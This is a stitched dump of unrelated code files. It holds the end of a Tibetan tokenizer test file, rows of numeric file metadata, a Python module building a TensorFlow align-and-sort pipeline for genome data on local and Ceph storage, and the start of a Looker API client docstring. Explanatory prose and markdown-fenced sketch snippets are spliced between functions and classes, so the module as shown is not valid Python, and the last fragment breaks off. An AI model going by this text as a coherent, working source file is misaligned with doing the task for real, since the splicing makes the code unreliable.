assert [t.text for t in tokens] == ["བརྒྱུད་", "སྐུ་གདུང་"]
def test_missing_token57(wt):
input_str = "སྒལ་བརྒྱུད་ཞབས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["སྒལ་", "བརྒྱུད་", "ཞབས་"]
def test_missing_token58(wt):
input_str = "བརྩེགས་ཆེ་མཆོག་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["བརྩེགས་", "ཆེ་མཆོག་"]
def test_missing_token59(wt):
input_str = "།་གླེན་ལྐུགས་"
tokens = wt.tokenize(input_str, split_affixes=False)
assert [t.text for t in tokens] == ["།་", "གླེན་ལྐུགས་"]
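The fifty-nine functions above repeat one pattern: tokenize an input string with `split_affixes=False` and compare the token texts to an expected list. A data-driven sketch of that pattern follows; `fake_tokenize` is a hypothetical stand-in, since the real `wt.tokenize` needs a trained botok `WordTokenizer` fixture that is not available here.

```python
# Each case is (input_str, expected_tokens); run_cases reports mismatches,
# mirroring the repeated assert [t.text for t in tokens] == [...] pattern.

CASES = [
    ("a b ", ["a ", "b "]),
    ("c d e", ["c ", "d ", "e"]),
]

def fake_tokenize(text):
    # Hypothetical stand-in for wt.tokenize(text, split_affixes=False):
    # split on spaces, keeping the trailing separator on each token.
    parts = text.split(" ")
    tokens = [p + " " for p in parts[:-1]]
    if parts[-1]:
        tokens.append(parts[-1])
    return tokens

def run_cases(tokenize, cases):
    failures = []
    for input_str, expected in cases:
        got = tokenize(input_str)
        if got != expected:
            failures.append((input_str, got, expected))
    return failures

failures = run_cases(fake_tokenize, CASES)
```

Under pytest, the same table could drive a single `@pytest.mark.parametrize` test instead of one function per case.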
| 29.394737 | 84 | 0.591226 | 2,348 | 11,170 | 3.014906 | 0.086031 | 0.133352 | 0.116683 | 0.175025 | 0.803221 | 0.762396 | 0.734143 | 0.705184 | 0.662664 | 0.649386 | 0 | 0.012099 | 0.193465 | 11,170 | 379 | 85 | 29.472296 | 0.688201 | 0 | 0 | 0.25 | 0 | 0.003846 | 0.132856 | 0.006088 | 0 | 0 | 0 | 0 | 0.226923 | 1 | 0.226923 | false | 0 | 0.003846 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
02ddf278e07df2469425b99e52000fed7ca4b008 | 36,816 | py | Python | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | app/align_sort.py | epfl-dcsl/ptf-persona | 8720e6b529450083d25fa730ec28a9d2d0270aae | [
"Apache-2.0"
] | null | null | null | # Copyright 2019 École Polytechnique Fédérale de Lausanne. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import itertools
import pathlib
from . import app
from modules.snap_align import fused_align_sort, merge as merge_stage, common as snap_common
from common.parse import numeric_min_checker, add_dataset, path_exists_checker, filepath_key
import tensorflow.contrib.gate as gate
import tensorflow as tf
import logging

logging.basicConfig(level=logging.DEBUG)
import tensorflow.contrib.persona as persona
persona_ops = persona.persona_ops()
from string import digits
import json
from .common import make_counter
align_sort_key = "align_sort"
merge_key = "merge"
combo_key = "combo"
performance_name_scope = "performance"
credit_link_end_to_end = "e2e"
credit_link_successive = "linear"
def add_common_args(parser):
parser.add_argument("--align-stages", dest="align_stages", default=0, type=numeric_min_checker(0, "must have at least 1 align fused_align_sort"), help="number of align stages")
parser.add_argument("--merge-stages", dest="merge_stages", default=0, type=numeric_min_checker(0, "must have at least 1 merge fused_align_sort"), help="number of merge stages")
parser.add_argument("--combo-stages", dest="combo_stages", default=0, type=numeric_min_checker(0, "must have non-negative number of combo stages for FAS/M"), help="number of combo fused-align-sort/merge stages")
parser.add_argument("--parallel-open-requests", type=numeric_min_checker(1, "must have at least 1 parallel open request"), help="if specified, the number of parallel open requests")
parser.add_argument("--parallel-open-request-expansion-factor", default=1.5, type=numeric_min_checker(0.1, numeric_type=float, message="must have at least 0.1 expansion factor"),
help="the expansion factor to multiple the number of client slots by to bound the capacity in the global pipeline. Not used if parallel_open_requests is set")
parser.add_argument("--credit-link", default=credit_link_successive, choices=(credit_link_end_to_end, credit_link_successive), help="Type of credit linking to use between successive stages")
parser.add_argument("--align-counters", default=False, action="store_true", help="track the exit rate of the align/sort stages")
parser.add_argument("--merge-counters", default=False, action="store_true", help="track the exit rate of the merge stages")
class AlignSort(app.Application):
ingress_dtypes = (tf.string,)
ingress_shapes = ((),)
@staticmethod
def name():
return "align-sort"
@staticmethod
def help_message():
return "align and sort a dataset using Snap"
class_logger = logging.getLogger(name="AlignClass")
@classmethod
def _make_graph_args(cls, parser):
add_common_args(parser=parser)
parser.add_argument("--log-goodput", default=False, action='store_true', help="turn on all goodput and latency tracing")
fused_align_sort.LocalFusedStage.add_graph_args(parser=parser)
merge_stage.LocalMergeStage.add_graph_args(parser=parser)
fused_align_sort.SmallLocalFusedStage.add_graph_args(parser=parser)
merge_stage.SmallLocalMergeStage.add_graph_args(parser=parser)
@classmethod
def device_counts(cls, args):
return {
align_sort_key: args.align_stages,
merge_key: args.merge_stages,
combo_key: args.combo_stages
}
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
num_merge = args.merge_stages
num_combo = args.combo_stages
num_align = args.align_stages
if (num_merge + num_combo) < 1:
raise Exception("Need >0 merge stages. Got {m} pure merge and {c} combo".format(m=num_merge, c=num_combo))
if (num_align + num_combo) < 1:
raise Exception("Need >0 align stages. Got {a} pure align stages and {c} combo".format(a=num_align, c=num_combo))
if args.parallel_open_requests is not None:
capacity_between_gates = args.parallel_open_requests
else:
capacity_between_gates = int(num_client_slots * args.parallel_open_request_expansion_factor)
if capacity_between_gates < 1:
raise Exception("Capacity between gates is <1 ({c})".format(c=capacity_between_gates))
args.parallel_open_requests = capacity_between_gates
self.log.info("Capacity between gates: {}".format(capacity_between_gates))
with tf.name_scope(gate_name):
ingress = gate.IngressGate(dtypes=self.ingress_dtypes, shapes=self.ingress_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
with tf.name_scope("align_sort_stage"):
align_stages = tuple(fused_align_sort.LocalFusedStage(args=args) for _ in range(num_align))
small_align_stages = tuple(fused_align_sort.SmallLocalFusedStage(args=args) for _ in range(num_combo))
def make_align_stages(stages, align_devices):
for stage, device in zip(align_stages, align_devices):
with device():
device_graph = stage.make_graph(upstream_gate=ingress)
try: # convert to a tuple if it returns a generator
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
assert len(stage.run_first) > 0
for item in stage.run_first:
self._add_run_first(tensor=item)
yield device_graph
outputs = tuple(itertools.chain.from_iterable(
make_align_stages(stages=s, align_devices=devices) for s, devices in (
(align_stages, device_map.get(align_sort_key, None)),
(small_align_stages, device_map.get(combo_key, None))
) if devices is not None
))
        assert len(outputs) == num_align + num_combo, "Expected {e} align stages ({a} pure align and {c} combo) but only got {actual}".format(
            e=num_align+num_combo, a=num_align, c=num_combo, actual=len(outputs))
outputs = tuple(itertools.chain.from_iterable(outputs)) # flattens it
example_output = outputs[0]
if args.credit_link == credit_link_end_to_end:
merge_gate_kwargs = {
"limit_upstream": False,
"limit_downstream": False
}
else:
merge_gate_kwargs = {
"capacity": capacity_between_gates
}
with tf.name_scope("inter_stage_gate"):
gate_name = "ready_to_merge"
merge_gate = gate.StreamingGate(
sample_tensors=example_output[1:-1],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name,
**merge_gate_kwargs
)
enqueue_ops = tuple(merge_gate.enqueue(id_and_count=a[0], components=a[1:-1]) for a in outputs)
if args.align_counters:
if getattr(args, "summary", False):
with tf.name_scope(None): # clears this out of the inter_stage_gate scope
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="sorted_counter",
summary_name="sorted_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[-1] for a in outputs)
)))
else:
self.log.warning("Align counters requested, but no summary was requested. Please enable summary for this to work.")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=merge_gate, enqueue_ops=enqueue_ops, device=merge_gate.device))
if args.credit_link == credit_link_successive:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=merge_gate)
with tf.name_scope("merge_stage"):
merge_stages = tuple(merge_stage.LocalMergeStage(args=args) for _ in range(num_merge))
small_merge_stages = tuple(merge_stage.SmallLocalMergeStage(args=args) for _ in range(num_combo))
def make_merge_stages(stages, merge_devices):
for stage, device in zip(merge_stages, merge_devices):
with device():
device_graph = stage.make_graph(upstream_gate=merge_gate)
try:
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
yield device_graph
merge_stage_outputs = tuple(itertools.chain.from_iterable(
make_merge_stages(stages=s, merge_devices=devices) for s, devices in (
(merge_stages, device_map.get(merge_key, None)),
(small_merge_stages, device_map.get(combo_key, None))
) if devices is not None
))
        assert len(merge_stage_outputs) == num_merge + num_combo, "Expected {e} merge devices ({p} pure merge and {c} combo), but only got {actual}".format(
            p=num_merge, c=num_combo, e=num_merge+num_combo, actual=len(merge_stage_outputs)
        )
merge_stage_outputs = tuple(itertools.chain.from_iterable(merge_stage_outputs)) # flattens it
example_output = merge_stage_outputs[0]
gate_name = "egress_gate"
with tf.name_scope(gate_name):
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output[1:],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name)
enqueue_ops = tuple(egress.enqueue(id_and_count=a[0], components=a[1:]) for a in merge_stage_outputs)
if args.merge_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="merged_counter",
summary_name="merged_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[3] for a in merge_stage_outputs)
)))
else:
self.log.warning("Merge counters requested, but no summary was requested. Please enable summary for this to work.")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops, device=egress.device))
if args.credit_link == credit_link_end_to_end:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
else:
gate.add_credit_supplier_from_gates(upstream_gate=merge_gate, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
with tf.name_scope("client_slots"):
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.ingress_shapes)
for idx in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape, name="client_slot_{}".format(idx)) for dtype, shape in zip(self.ingress_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders, name="ingress_enqueue_{}".format(idx))
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue, name="egress_dequeue_{}".format(idx))
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
# TODO assume that for now it is just the local filesystem. Will need to differentiate for other stuff later
add_dataset(parser=parser)
parser.add_argument("-d", "--dataset-dir", type=path_exists_checker(), help="Directory containing ALL of the chunk files")
parser.add_argument("--overwrite", default=False, action="store_true", help="Overwrite existing metadata file when the pipeline finishes. Default: create a new one")
@classmethod
def process_ingress_args(cls, args):
dataset_dir = args.dataset_dir
if dataset_dir is None:
metadata_path = args.dataset[filepath_key]
dataset_dir = metadata_path.parent
files_to_remove = tuple(itertools.chain(dataset_dir.glob("*.results"), dataset_dir.glob("*.secondary*"),
dataset_dir.glob("*intermediate*")))
if len(files_to_remove) > 0:
cls.class_logger.info("Removing prior results before aligning: {}".format(", ".join(str(a) for a in files_to_remove)))
for f in files_to_remove:
if f.exists(): # globs may have overwritten each other
assert f.is_file()
f.unlink()
if len(args.dataset["records"]) == 0:
raise ValueError("Dataset must have non-zero number of records")
return tuple(str((dataset_dir / record["path"]).absolute()) for record in args.dataset["records"])
@classmethod
def process_egress_results(cls, results, args):
"""
:param results: a list of [ [ names, of, intermediate, files] ]
:param args:
:return:
"""
def get_result_columns(path_columns):
a = set()
for path_column in path_columns:
path = pathlib.PurePath(path_column[0])
extension = path.suffix[1:] # strip the leading dot
if extension in a:
raise Exception("Runtime error: extension '{e}' already in a column. Columns: {c}".format(
e=extension, c=", ".join(x for x in a)
))
a.add(extension)
for other_column in path_column[1:]:
other_path = pathlib.PurePath(other_column)
other_extension = other_path.suffix[1:]
if other_extension != extension:
raise Exception("Expected all column extensions to match. Expected '{exp}', but got '{actual}'".format(
exp=extension, actual=other_extension
))
return a
record_ids, first_ordinals, num_recordz, file_basenames = results[:4]
full_file_pathz = results[4:]
dataset = args.dataset
output_filepath = dataset.pop(filepath_key)
processed_columns = get_result_columns(path_columns=full_file_pathz)
columns = set(dataset["columns"])
if not columns.issubset(processed_columns):
raise Exception("Output columns do not include all input columns. Input: [{before}], Output: [{after}]".format(
before=", ".join(columns), after=", ".join(processed_columns)
))
if snap_common.results_extension not in processed_columns:
raise Exception("Expected extension '{res_ext}' in the results extensions, but didn't find it.".format(res_ext=snap_common.results_extension))
only_secondary = processed_columns.difference({snap_common.results_extension,
snap_common.base_extension,
snap_common.metadata_extension,
snap_common.qual_extension})
for res_ext in only_secondary:
stripped = res_ext.translate({ord(k): None for k in digits})
if stripped != snap_common.secondary_results_extension:
raise Exception("Secondary or unknown results extension found: '{found}'".format(found=res_ext))
merge_att = "_".join((merge_stage.LocalMergeStage.local_dest, "make_new"))
overwrite = args.overwrite or (hasattr(args, merge_att) and not getattr(args, merge_att))
if not overwrite:
filename = output_filepath.stem
file_dir = output_filepath.parent
output_filepath = file_dir / (filename+"_sorted"+output_filepath.suffix)
if output_filepath.exists():
cls.class_logger.warning("Output metadata path '{p}' exists. Will overwrite!".format(p=str(output_filepath)))
columns_to_add = sorted(tuple(processed_columns.difference(columns)))
dataset["columns"].extend(columns_to_add)
first_record_id = record_ids[0]
if not all(f == first_record_id for f in record_ids[1:]):
raise Exception("Not all record IDs are equal: [{rids}]".format(rids=", ".join(record_ids)))
if first_record_id != dataset["name"]:
cls.class_logger.warning("Input metadata specified a record id of '{metadata_version}', but pipeline output '{new_version}'. Overwriting with {new_version}.".format(
metadata_version=dataset["name"], new_version=first_record_id
))
dataset["name"] = first_record_id
as_keys = (pathlib.PurePath(a).stem for a in file_basenames)
new_records = [
{
"path": path,
"first": first_ordinal,
"last": first_ordinal + num_records
} for path, first_ordinal, num_records in zip(as_keys, first_ordinals, num_recordz)
]
dataset["records"] = new_records
with output_filepath.open("w+") as f:
json.dump(dataset, f, indent=4)
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
results = tuple(sess.run(egress_dequeue, feed_dict={ingress_placeholder: tuple(str(c) for c in client_args)}))
record_ids, first_ordinals, num_recordz, file_basenames = results[:4]
full_file_pathz = tuple(results[4:])
utf8 = "utf-8"
new_record_ids = tuple(i.decode(utf8) for i in record_ids)
new_first_ordinals = tuple(int(i) for i in first_ordinals)
new_num_recordz = tuple(int(i) for i in num_recordz)
new_file_basenames = tuple(i.decode(utf8) for i in file_basenames)
new_full_file_pathz = tuple(
tuple(b.decode(utf8) for b in ffp)
for ffp in full_file_pathz
)
return (new_record_ids, new_first_ordinals, new_num_recordz, new_file_basenames) + new_full_file_pathz
def stop(self, sess):
try:
sess.run(self.close_op)
except Exception as e:
self.log.error("Exception while closing {nm}: '{e}'".format(e=e, nm=self.name()))
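# A minimal, self-contained sketch of the digit-stripping validation that both
# process_egress_results implementations apply to secondary-results extensions.
# The helper name strip_digits and the sample extensions are hypothetical; only
# the str.translate idiom is taken from the code above.

```python
from string import digits

def strip_digits(extension):
    # Drop every decimal digit, mirroring the secondary-results check
    # (e.g. "secondary0" and "secondary12" both reduce to "secondary").
    return extension.translate({ord(k): None for k in digits})

assert strip_digits("secondary0") == "secondary"
assert strip_digits("results") == "results"
```

# Any extension that does not reduce to the known secondary-results stem after
# this transformation is treated as unknown and rejected with an exception.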
class CephAlignSort(app.Application):
ingress_dtypes = (tf.string,)
ingress_shapes = ((2,),)  # each request is a (key, namespace) pair; (2) alone is just the int 2
@staticmethod
def name():
return "ceph-align-sort"
@staticmethod
def help_message():
return "align a ceph dataset using Snap"
class_logger = logging.getLogger(name="CephAlignClass")
@classmethod
def _make_graph_args(cls, parser):
add_common_args(parser=parser)
parser.add_argument("--log-goodput", default=False, action='store_true', help="turn on all goodput and latency tracing")
fused_align_sort.CephFusedStage.add_graph_args(parser=parser)
merge_stage.CephMergeStage.add_graph_args(parser=parser)
fused_align_sort.SmallCephFusedStage.add_graph_args(parser=parser)
merge_stage.SmallCephMergeStage.add_graph_args(parser=parser)
@classmethod
def device_counts(cls, args):
return {
align_sort_key: args.align_stages,
merge_key: args.merge_stages,
combo_key: args.combo_stages
}
def _construct_graph(self, args, device_map, num_client_slots):
gate_name = "ingress_gate"
num_merge = args.merge_stages
num_combo = args.combo_stages
num_align = args.align_stages
if (num_merge + num_combo) < 1:
raise Exception("Need >0 merge stages. Got {m} pure merge and {c} combo".format(m=num_merge, c=num_combo))
if (num_align + num_combo) < 1:
raise Exception("Need >0 align stages. Got {a} pure align stages and {c} combo".format(a=num_align, c=num_combo))
if args.parallel_open_requests is not None:
capacity_between_gates = args.parallel_open_requests
else:
capacity_between_gates = int(num_client_slots * args.parallel_open_request_expansion_factor)
if capacity_between_gates < 1:
raise Exception("Capacity between gates is <1 ({c})".format(c=capacity_between_gates))
args.parallel_open_requests = capacity_between_gates
self.log.info("Capacity between gates: {}".format(capacity_between_gates))
with tf.name_scope(gate_name):
ingress = gate.IngressGate(dtypes=self.ingress_dtypes, shapes=self.ingress_shapes, capacity=capacity_between_gates,
shared_name=gate_name, name=gate_name)
with tf.name_scope("align_sort_stage"):
align_stages = tuple(fused_align_sort.CephFusedStage(args=args) for _ in range(num_align))
small_align_stages = tuple(fused_align_sort.SmallCephFusedStage(args=args) for _ in range(num_combo))
def make_align_stages(stages, align_devices):
for stage, device in zip(stages, align_devices):
with device():
device_graph = stage.make_graph(upstream_gate=ingress)
try: # convert to a tuple if it returns a generator
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
assert len(stage.run_first) > 0
for item in stage.run_first:
self._add_run_first(tensor=item)
yield device_graph
outputs = tuple(itertools.chain.from_iterable(
make_align_stages(stages=s, align_devices=devices) for s, devices in (
(align_stages, device_map.get(align_sort_key, None)),
(small_align_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(outputs) == num_align + num_combo, "Expected {e} align stages ({a} pure align and {c} combo), but only got {actual}".format(
e=num_align+num_combo, a=num_align, c=num_combo, actual=len(outputs))
outputs = tuple(itertools.chain.from_iterable(outputs)) # flattens it
example_output = outputs[0]
if args.credit_link == credit_link_end_to_end:
merge_gate_kwargs = {
"limit_upstream": False,
"limit_downstream": False
}
else:
merge_gate_kwargs = {
"capacity": capacity_between_gates
}
with tf.name_scope("inter_stage_gate"):
gate_name = "ready_to_merge"
merge_gate = gate.StreamingGate(
sample_tensors=example_output[1:-1],
id_and_count_upstream=example_output[0], join=True,
name=gate_name, shared_name=gate_name,
**merge_gate_kwargs
)
enqueue_ops = tuple(merge_gate.enqueue(id_and_count=a[0], components=a[1:-1]) for a in outputs)
if args.align_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="sorted_counter",
summary_name="sorted_num_records",
deps_and_counters=zip(
enqueue_ops,
(a[-1] for a in outputs)
)))
else:
self.log.warning("Align counters requested, but no summary was requested. Please enable summary for this to work.")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=merge_gate, enqueue_ops=enqueue_ops, device=merge_gate.device))
if args.credit_link == credit_link_successive:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=merge_gate)
with tf.name_scope("merge_stage"):
merge_stages = tuple(merge_stage.CephMergeStage(args=args) for _ in range(num_merge))
small_merge_stages = tuple(merge_stage.SmallCephMergeStage(args=args) for _ in range(num_combo))
def make_merge_stages(stages, merge_devices):
for stage, device in zip(stages, merge_devices):
with device():
device_graph = stage.make_graph(upstream_gate=merge_gate)
try:
device_graph[0]
except TypeError:
device_graph = tuple(device_graph)
yield device_graph
merge_stage_outputs = tuple(itertools.chain.from_iterable(
make_merge_stages(stages=s, merge_devices=devices) for s, devices in (
(merge_stages, device_map.get(merge_key, None)),
(small_merge_stages, device_map.get(combo_key, None))
) if devices is not None
))
assert len(merge_stage_outputs) == num_merge + num_combo, "Expected {e} merge stages ({p} pure merge and {c} combo), but only got {actual}".format(
p=num_merge, c=num_combo, e=num_merge+num_combo, actual=len(merge_stage_outputs)
)
merge_stage_outputs = tuple(itertools.chain.from_iterable(merge_stage_outputs)) # flattens it
example_output = merge_stage_outputs[0]
gate_name = "egress_gate"
with tf.name_scope(gate_name):
egress = gate.EgressGate(capacity=capacity_between_gates, sample_tensors=example_output.components,
id_and_count_upstream=example_output.id_and_count, join=True,
name=gate_name, shared_name=gate_name)
enqueue_ops = tuple(egress.enqueue(id_and_count=a.id_and_count, components=a.components) for a in merge_stage_outputs)
if args.merge_counters:
if getattr(args, "summary", False):
with tf.name_scope(None):
with tf.name_scope(performance_name_scope):
enqueue_ops = tuple(make_counter(counter_name="merged_counter",
summary_name="merged_num_records",
deps_and_counters=zip(
enqueue_ops,
(a.components[2] for a in merge_stage_outputs)
)))
else:
self.log.warning("Merge counters requested, but no summary was requested. Please enable summary for this to work.")
gate.add_gate_runner(gate_runner=gate.GateRunner(gate=egress, enqueue_ops=enqueue_ops,
device=egress.device))
if args.credit_link == credit_link_end_to_end:
gate.add_credit_supplier_from_gates(upstream_gate=ingress, downstream_gate=egress)
else:
gate.add_credit_supplier_from_gates(upstream_gate=merge_gate, downstream_gate=egress)
self.close_op = (ingress.close(), egress.close())
with tf.name_scope("client_slots"):
unknown_shape = tf.TensorShape([None])
batch_ingress_shapes = tuple(unknown_shape.concatenate(ishape) for ishape in self.ingress_shapes)
for idx in range(num_client_slots):
ingress_placeholders = tuple(tf.placeholder(dtype=dtype, shape=shape, name="client_slot_{}".format(idx)) for dtype, shape in zip(self.ingress_dtypes, batch_ingress_shapes))
ingress_enqueue = ingress.enqueue_request(components=ingress_placeholders, name="ingress_enqueue_{}".format(idx))
egress_dequeue = egress.dequeue_request(request_id=ingress_enqueue, name="egress_dequeue_{}".format(idx))
yield self.ClientSlot(ingress_placeholders=ingress_placeholders, egress_dequeue=egress_dequeue)
@classmethod
def make_client_args(cls, parser):
add_dataset(parser=parser)
parser.add_argument("--overwrite", default=False, action="store_true", help="Overwrite existing metadata file when the pipeline finishes. Default: create a new one")
parser.add_argument("--namespace", default="", help="the namespace to access this dataset")
parser.add_argument("--use-default-namespace", default=False, action="store_true", help="use the name of this record as the namespace")
@classmethod
def process_ingress_args(cls, args):
dataset = args.dataset
if args.use_default_namespace:
namespace = dataset["name"]
else:
namespace = args.namespace
if namespace == "":
cls.class_logger.warning("Dataset {rid} has no namespace specified!".format(rid=dataset["name"]))
record_keys = (a["path"] for a in dataset["records"])
return tuple(zip(record_keys, itertools.repeat(namespace)))
@classmethod
def process_egress_results(cls, results, args):
"""
:param results: a list of [ [ names, of, intermediate, files] ]
:param args:
:return:
"""
def get_result_columns(key_columns):
a = set()
for key_column in key_columns:
decoded_key = key_column[0]
split = decoded_key.split(".")
assert len(split) == 2
extension = split[1]
if extension in a:
raise Exception("Runtime error: extension '{e}' already in a column. Columns: {c}".format(
e=extension, c=", ".join(x for x in a)
))
a.add(extension)
for other_column in key_column[1:]:
other_decoded_key = other_column
other_split = other_decoded_key.split(".")
assert len(other_split) == 2
other_extension = other_split[1]
if other_extension != extension:
raise Exception("Expected all column extensions to match. Expected '{exp}', but got '{actual}'".format(
exp=extension, actual=other_extension
))
return a
record_ids, first_ordinals, num_recordz, keys, namespaces = results[:5]
full_keys_records = results[5:]
dataset = args.dataset
output_filepath = dataset.pop(filepath_key)
processed_columns = get_result_columns(key_columns=full_keys_records)
columns = set(dataset["columns"])
if not columns.issubset(processed_columns):
raise Exception("Output columns do not include all input columns. Input: [{before}], Output: [{after}]".format(
before=", ".join(columns), after=", ".join(processed_columns)
))
if snap_common.results_extension not in processed_columns:
raise Exception("Expected extension '{res_ext}' in the results extensions, but didn't find it.".format(res_ext=snap_common.results_extension))
only_secondary = processed_columns.difference({snap_common.results_extension,
snap_common.base_extension,
snap_common.metadata_extension,
snap_common.qual_extension})
for res_ext in only_secondary:
stripped = res_ext.translate({ord(k): None for k in digits})
if stripped != snap_common.secondary_results_extension:
raise Exception("Secondary or unknown results extension found: '{found}'".format(found=res_ext))
merge_att = "_".join((merge_stage.CephMergeStage.local_dest, "make_new"))
overwrite = args.overwrite or (hasattr(args, merge_att) and not getattr(args, merge_att))
if not overwrite:
filename = output_filepath.stem
file_dir = output_filepath.parent
output_filepath = file_dir / (filename+"_sorted"+output_filepath.suffix)
if output_filepath.exists():
cls.class_logger.warning("Output metadata path '{p}' exists. Will overwrite!".format(p=str(output_filepath)))
columns_to_add = sorted(tuple(processed_columns.difference(columns)))
dataset["columns"].extend(columns_to_add)
first_record_id = record_ids[0]
if not all(f == first_record_id for f in record_ids[1:]):
raise Exception("Not all record IDs are equal: [{rids}]".format(rids=", ".join(record_ids)))
if first_record_id != dataset["name"]:
cls.class_logger.warning("Input metadata specified a record id of '{metadata_version}', but pipeline output '{new_version}'. Overwriting with {new_version}.".format(
metadata_version=dataset["name"], new_version=first_record_id
))
dataset["name"] = first_record_id
new_records = [
{
"path": path,
"first": first_ordinal,
"last": first_ordinal + num_records
} for path, first_ordinal, num_records in zip(keys, first_ordinals, num_recordz)
]
dataset["records"] = new_records
with output_filepath.open("w+") as f:
json.dump(dataset, f, indent=4)
def _run_client_request(self, client_args, client_slot, sess):
client_args = tuple(client_args)
ingress_placeholder = client_slot.ingress_placeholders[0]
egress_dequeue = client_slot.egress_dequeue
results = sess.run(egress_dequeue, feed_dict={ingress_placeholder: client_args})
record_ids, first_ordinals, num_recordz, keys, namespaces = results[:5]
full_keys_records = results[5:]
utf8 = "utf-8"
new_record_ids = tuple(i.decode(utf8) for i in record_ids)
new_first_ordinals = tuple(int(i) for i in first_ordinals)
new_num_recordz = tuple(int(i) for i in num_recordz)
new_keys = tuple(i.decode(utf8) for i in keys)
new_namespaces = tuple(i.decode(utf8) for i in namespaces)
new_full_keys_records = tuple(
tuple(b.decode(utf8) for b in ffp)
for ffp in full_keys_records
)
return (new_record_ids, new_first_ordinals, new_num_recordz, new_keys, new_namespaces) + new_full_keys_records
def stop(self, sess):
try:
sess.run(self.close_op)
except Exception as e:
self.log.error("Exception while closing {nm}: '{e}'".format(e=e, nm=self.name()))
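# A minimal sketch of how both process_egress_results implementations rebuild
# the dataset's "records" list from pipeline output. All values below are
# hypothetical; only the zip/dict-comprehension shape matches the code above.

```python
# Hypothetical pipeline outputs: chunk keys, first ordinals, record counts.
keys = ("chunk_0", "chunk_1")
first_ordinals = (0, 1000)
num_recordz = (1000, 750)

# Each record stores its ordinal interval via "first" and "last",
# matching the new_records construction in process_egress_results.
new_records = [
    {"path": path, "first": first, "last": first + count}
    for path, first, count in zip(keys, first_ordinals, num_recordz)
]

assert new_records[0]["last"] == 1000
assert new_records[1] == {"path": "chunk_1", "first": 1000, "last": 1750}
```

# The resulting list replaces dataset["records"] before the metadata JSON is
# written back out with json.dump.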
# coding: utf-8
"""
Looker API 3.1 Reference
### Authorization The Looker API uses Looker **API3** credentials for authorization and access control. Looker admins can create API3 credentials on Looker's **Admin/Users** page. Pass API3 credentials to the **/login** endpoint to obtain a temporary access_token. Include that access_token in the Authorization header of Looker API requests. For details, see [Looker API Authorization](https://looker.com/docs/r/api/authorization) ### Client SDKs The Looker API is a RESTful system that should be usable by any programming language capable of making HTTPS requests. Client SDKs for a variety of programming languages can be generated from the Looker API's Swagger JSON metadata to streamline use of the Looker API in your applications. A client SDK for Ruby is available as an example. For more information, see [Looker API Client SDKs](https://looker.com/docs/r/api/client_sdks) ### Try It Out! The 'api-docs' page served by the Looker instance includes 'Try It Out!' buttons for each API method. After logging in with API3 credentials, you can use the \"Try It Out!\" buttons to call the API directly from the documentation page to interactively explore API features and responses. Note! With great power comes great responsibility: The \"Try It Out!\" button makes API calls to your live Looker instance. Be especially careful with destructive API operations such as `delete_user` or similar. There is no \"undo\" for API operations. ### Versioning Future releases of Looker will expand this API release-by-release to securely expose more and more of the core power of Looker to API client applications. API endpoints marked as \"beta\" may receive breaking changes without warning (but we will try to avoid doing that). Stable (non-beta) API endpoints should not receive breaking changes in future releases. For more information, see [Looker API Versioning](https://looker.com/docs/r/api/versioning) This **API 3.1** is in active development. 
